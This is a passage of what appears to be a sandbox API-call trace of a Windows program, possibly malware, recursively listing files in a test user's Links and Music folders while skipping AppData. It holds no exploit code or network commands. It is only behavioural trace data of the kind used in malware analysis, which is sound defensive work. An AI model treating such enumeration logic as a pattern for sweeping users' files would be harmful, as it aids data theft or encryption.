hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x11c0068, ftCreationTime.dwLowDateTime=0xc306a, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0xf60069, nFileSizeHigh=0xc306a, nFileSizeLow=0x76b420, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Wi\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.466] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.467] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.467] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.467] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.467] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.468] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0xf80079, ftCreationTime.dwLowDateTime=0xc3082, ftCreationTime.dwHighDateTime=0x657690, ftLastAccessTime.dwLowDateTime=0xc306d, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0xd6310, ftLastWriteTime.dwHighDateTime=0x132007a, nFileSizeHigh=0xc3082, nFileSizeLow=0x657380, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="眐e\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.468] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.468] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.468] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Links", cAlternateFileName="")) returned 1 [0074.468] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.468] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.468] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Links", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0074.468] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.468] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.469] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.469] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.469] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.469] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0074.470] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.470] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x10, dwReserved1=0x657690, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0074.470] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0xf80079, ftCreationTime.dwLowDateTime=0xc30f2, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0xea007a, nFileSizeHigh=0xc30f2, nFileSizeLow=0x76a958, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Re\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.470] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.470] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0074.470] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Local Settings", cchCount1=14, lpString2="AppData", cchCount2=7) returned 3 [0074.470] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b360, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x857028b, nFileSizeHigh=0xb8754, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.471] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac52fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac52fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x61e84c, dwReserved1=0x657690, cFileName="Music", cAlternateFileName="")) returned 1 [0074.471] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0074.471] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.471] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac52fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac52fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.471] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac52fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac52fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.471] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x63358590, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 1 [0074.471] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.471] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c59920, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x1ccfcb50, ftLastAccessTime.dwHighDateTime=0x1d5e03b, ftLastWriteTime.dwLowDateTime=0x1ccfcb50, ftLastWriteTime.dwHighDateTime=0x1d5e03b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ETYJoLZsQISXnK0OL", cAlternateFileName="ETYJOL~1")) returned 1 [0074.471] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL", cchCount1=17, lpString2="AppData", cchCount2=7) returned 3 [0074.471] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.471] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c59920, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x1ccfcb50, ftLastAccessTime.dwHighDateTime=0x1d5e03b, ftLastWriteTime.dwLowDateTime=0x1ccfcb50, ftLastWriteTime.dwHighDateTime=0x1d5e03b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.472] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c59920, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x1ccfcb50, ftLastAccessTime.dwHighDateTime=0x1d5e03b, ftLastWriteTime.dwLowDateTime=0x1ccfcb50, ftLastWriteTime.dwHighDateTime=0x1d5e03b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.472] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x94d68360, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 1 [0074.475] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0xefe21660, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x10, dwReserved1=0x657690, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 1 [0074.475] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847a90, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x65d0360, ftLastAccessTime.dwHighDateTime=0x1d5deba, ftLastWriteTime.dwLowDateTime=0x65d0360, ftLastWriteTime.dwHighDateTime=0x1d5deba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="fgMpL3n", cAlternateFileName="")) returned 1 [0074.476] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: 